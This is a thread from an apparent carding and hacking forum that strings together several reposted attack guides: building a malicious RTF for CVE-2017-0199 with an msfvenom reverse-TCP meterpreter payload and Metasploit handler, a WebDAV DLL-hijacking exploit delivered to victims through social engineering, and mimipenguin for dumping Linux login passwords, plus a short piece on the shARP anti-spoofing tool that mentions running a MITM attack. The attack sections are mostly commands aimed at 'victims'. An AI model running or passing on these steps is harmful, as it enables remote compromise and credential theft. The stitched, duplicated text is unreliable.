+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Carding Zone (https://bhcforums.cc/Forum-Carding-Zone)
+--- Forum: Carders Home (https://bhcforums.cc/Forum-Carders-Home)
+--- Thread: [Guide] How to Exploit Windows 10 PC with Microsoft RTF File (/Thread-Guide-How-to-Exploit-Windows-10-PC-with-Microsoft-RTF-File)
[Guide] How to Exploit Windows 10 PC with Microsoft RTF File - NINZA - 05-02-2020
Microsoft word is vulnerable against malicious RTF file, in this article we have made a zero-day attack on MS- word 2013 using python script which will generate a malicious .rtf file and will give a meterpreter session of the targeted system.
Exploit toolkit CVE-2017-0199 – v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and it will deliver Metasploit / meterpreter / any other payload to the victim without any complex configuration.
Let’s start!!!
Attacker: Kali Linux
Target: Windows 10 (Microsoft Word 2007 – 2013)
Open the terminal inside your Kali Linux and type the following.
git clone
[To see content please register here]
1
git clone
[To see content please register here]
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-dZud1H4gntQ/WPoVhLt_4VI/AAAAAAAAP0g/jGVWpb72cmMaJdGk10LLYwlrHZpQtwEDwCLcB/s1600/1.png?w=687&ssl=1)
cd CVE-2017-0199
python cve-2017-0199_toolkit.py -M gen -w Sales.rtf -u
[To see content please register here]
1
2
cd CVE-2017-0199
python cve-2017-0199_toolkit.py -M gen -w Sales.rtf -u
[To see content please register here]
This command will run a python script to generate a rich text format payload where –M is used for generating rtf file –w is used for the name of rtf file i.e. “sales.rtf” and –u for attacker’s IP address or domain name.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-yiYgFgUzI7c/WPoVg8Awm4I/AAAAAAAAP0Y/95oS3izCrmo44rEkjzKxNOWXLx8re9dOgCLcB/s1600/2.png?w=687&ssl=1)
As you can figure out in the given screenshot that above command has generated a malicious sales .rtf file, now before we send this file to our victim we need to connect it with any backdoor file so that we can establish a reverse connection with the victim.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-jtOigHOTtz8/WPoVhIZ93bI/AAAAAAAAP0c/uLU4mMDfQyAc0_vP49eXFv_O0vNV3HhHwCLcB/s1600/3.png?w=687&ssl=1)
On a new terminal use msfvenom to prepare an exe payload for attack and type the following.
msfvenom –p windows/meterpreter/reverse_tcp lhost=192.168.1.24 lport=4444 –f exe > /root/Desktop/raj.exe
1
msfvenom –p windows/meterpreter/reverse_tcp lhost=192.168.1.24 lport=4444 –f exe > /root/Desktop/raj.exe
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-5U8SmS3XI_I/WPoVhlqP7FI/AAAAAAAAP0k/9WGMOYmcZf4V_bLnHNYoFtycrNqyZBGwgCLcB/s1600/4.png?w=687&ssl=1)
Now move raj.exe into /var/www/html.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-Hj8eF9HQNjU/WPoVhkR0S9I/AAAAAAAAP0o/TRZJE8a_cHs4n_xeVzmK1UOV8HYD3EkHACLcB/s1600/5.png?w=687&ssl=1)
Now type following command where it will merge raj.exe with sales.rtf. Then you have to share the updated rtf file with the victim and start multi handler simultaneously for reverse connection of the victim.
python cve-2017-0199_toolkit.py -M exp -e
[To see content please register here]
-l /var/www/html/raj.exe1
python cve-2017-0199_toolkit.py -M exp -e
[To see content please register here]
-l /var/www/html/raj.exe![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-1VbiyEbE9eA/WPoVhySnGII/AAAAAAAAP0s/38Xzxfa3xv48m8G7tOSM_-RbsRmKjVicACLcB/s1600/6.png?w=687&ssl=1)
When victim will open sales file which will be in doc format in the meantime attacker will receive his meterpreter session inside Metasploit framework.
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.24
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
meterpreter > sysinfo
1
2
3
4
5
6
msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.24
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
meterpreter > sysinfo
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-ytS1Ntqfs8U/WPoViKw6ksI/AAAAAAAAP0w/82y0iuu7w1UDuzc5H8DKOrvuYBFq-ag9wCLcB/s1600/7.png?w=687&ssl=1)
This article is written to introduce a new tool called shARP. It is an anti-ARP-spoofing program and uses an active scanning process to identify any ARP-spoofing event.
ARP spoofing allows an attacker to intercept data frames on a network, modify the traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such as denial of service, a man in the middle, or session hijacking attacks. Our anti- ARP spoofing program, (shARP) detects the presence of a third-party in a private network actively. It has 2 modes: defensive and offensive.
- Defensive mode protects the end-user from the spoofer by disconnecting the user’s system from the network and alerts the user by an audio message.
- Offensive mode disconnects the user’s system from the network and further kicks out the attacker by sending de-authentication packets to his system, unable him to reconnect to the network until the program is manually reset.
Let’s start!
Open the terminal in Kali Linux and type following command to download it
git clone
[To see content please register here]
1
git clone
[To see content please register here]
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-OgiECUVVTEs/WPeIJ4UJWtI/AAAAAAAAPz4/crprsXn8vWYKEMvj3dvaqN5P6v34X0CbQCLcB/s1600/1.png?w=687&ssl=1)
If the user wants to secure his network by scanning for any attacker he can run the program. The program offers a simple command line interface which makes it easy for the new users. Now type the following command to run this program:
chmod 777 shARP.sh
./shARP.sh -h
1
2
chmod 777 shARP.sh
./shARP.sh -h
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-YPaP5xxk_u0/WPeIKItD79I/AAAAAAAAP0A/YCGjBBDea4ExkWm5V8wQzeD5-AGBzzkzgCLcB/s1600/2.png?w=687&ssl=1)
Then we had used zanti for sniffing in the network and start MIMT attack on selected target IP: 192.168.1.9 so that we can view its network traffic.
![[Image: 3.1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-PIWetqYw5Hc/WPeIKPESbLI/AAAAAAAAPz8/v4-laVUWBuAkmNfV-pFS9edpFo-hm2chgCLcB/s1600/3.1.png?w=687&ssl=1)
When the user runs the program in defensive mode, As soon as the program detects a spoofer in the network, and it disconnects the user’s system from the network so as to protect the private data being transferred between the system and the server. It also saves a log file about the attacker for further use.
./shARP.sh -d eth0
1
./shARP.sh -d eth0
From the screenshot you can the highlighted text is showing the Mac address of android phone trying to perform spoofing.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-RvhXupicIq8/WPeIKneD4KI/AAAAAAAAP0E/sZlB5luNONcJtzVyTBDG5n_4mqfy2Kd7wCLcB/s1600/3.png?w=687&ssl=1)
So when it finds spoofing in the network, it disconnects the user from the network. From the screenshot, you can see now the user is assigned with its localhost IP.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-pHEhml-aUcY/WPeIKpS2lNI/AAAAAAAAP0I/ytNoUvs1_EwvEeCcvfOke1qPUrxP-z0vgCLcB/s1600/4.png?w=687&ssl=1)
Through this article, you will learn about WebDAV application DLL hijacking exploitation using the Metasploit framework and to hack the victim through malicious code execution.
Attacker: Kali Linux
Target: Window 7 (torrent)
Let’s start!!!
Open the terminal and type msfconsole to load the Metasploit framework.
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-NT6j0QNG-vo/WPTi526g1RI/AAAAAAAAPzc/jnZaOX5sufgdife-_MeP7ovmG6x0O1InwCLcB/s1600/1.png?w=687&ssl=1)
This module presents a directory of file extensions that can lead to code execution when opened from the share. The default EXTENSIONS option must be configured to specify a vulnerable application type.
use exploit/windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp
msf exploit(webdav_dll_hijacker) >set lhost 192.168.0.107
msf exploit(webdav_dll_hijacker) >set extensions torrent
msf exploit(webdav_dll_hijacker) >exploit
1
2
3
4
5
use exploit/windows/browser/webdav_dll_hijacker
msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp
msf exploit(webdav_dll_hijacker) >set lhost 192.168.0.107
msf exploit(webdav_dll_hijacker) >set extensions torrent
msf exploit(webdav_dll_hijacker) >exploit
It has generated a malicious code which you can perceive from screenshots highlighted text \\192.168.0.107\documents\, so now being an attacker you are suggested to share this link to your targeted client using social engineering.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-TH-qDFBVXEw/WPTi50WmpBI/AAAAAAAAPzg/GX0HgHI5ES0lSwmihUbiP9Rq_zZuOw0WQCLcB/s1600/2.png?w=687&ssl=1)
Once you have shared malicious code link to the client, now when the client will open the link he will be intended to a document folder with many file extensions and the attacker will receive his meterpreter session.
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-X9oo3BiYfbI/WPTi6N3zGfI/AAAAAAAAPzk/iopgGJnOJ4kNubvX9jt8zKQM84lhvMzRQCLcB/s1600/3.png?w=687&ssl=1)
Hence meterpreter session 1 opened successfully now we are connected with the target through port 4444.
msf exploit(webdav_dll_hijacker) >sessions 1
meterpreter> sysinfo
1
2
msf exploit(webdav_dll_hijacker) >sessions 1
meterpreter> sysinfo
NOW TRY YOURSELF GOOD LUCK!!!
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-wALu8LzpAP4/WPTi6fjNf7I/AAAAAAAAPzo/-WXZdJPbpPIS8Jrv50L4uY5giQTSPL5agCLcB/s1600/4.png?w=687&ssl=1)
Hello friends! Through this article, we are introducing a new tool MINIPENUIN between us, which can utilize for fetching login of the Linux system in the same way as MIMIKATZ.
A tool to dump the login password from the current Linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz.
Takes advantage of clear text credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. Will attempt to calculate each word’s probability by checking hashes in /etc/shadow, hashes in memory, and regex searches.
Let’s begin
Open the terminal and type following command to download it from git hub.
cd Desktop
git clone
[To see content please register here]
1
2
cd Desktop
git clone
[To see content please register here]
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-fcti_szKOGg/WPLvLdOk5lI/AAAAAAAAPzI/ZD9ALUAHLAMFgFnIKRErDWaGdpNWI5wUACLcB/s1600/1.png?w=687&ssl=1)
ls
cd mimipenguin
1
2
ls
cd mimipenguin
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-Khh42xexmK0/WPLvLEO-GeI/AAAAAAAAPzE/0DV-1IoPKKAbYacpFWQL6OSJhtFZ29TvgCLcB/s1600/2.png?w=687&ssl=1)
Now run the bash file to catch the clear text credential
./mimipenguin.sh
1
./mimipenguin.sh
From the screenshot, you can see I have got login credential root: toor.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-XoFffBHtCBU/WPLvLaBTiQI/AAAAAAAAPzM/REtCO6EHTbYhUtdDfjzzUs5GFWJcQ1p6QCLcB/s1600/3.png?w=687&ssl=1)